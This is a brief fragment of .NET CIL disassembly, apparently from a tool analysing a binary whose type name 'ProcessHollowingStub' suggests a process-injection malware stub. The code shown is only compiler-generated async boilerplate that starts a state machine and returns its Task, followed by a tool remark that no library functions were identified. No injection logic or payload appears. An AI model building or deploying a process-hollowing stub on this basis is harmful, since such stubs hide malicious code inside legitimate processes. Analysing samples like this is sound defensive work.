stloc local1
ldloca.s local1
ldloca.s local0
call System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start
; Return the Task exposed by the state machine's builder.
ldloca.s local0
ldflda ProcessHollowingStub.Program.<RunStub>d__0.<>t__builder
call [System.Runtime.CompilerServices.AsyncTaskMethodBuilder.get_Task]
ret
}
No library functions identified.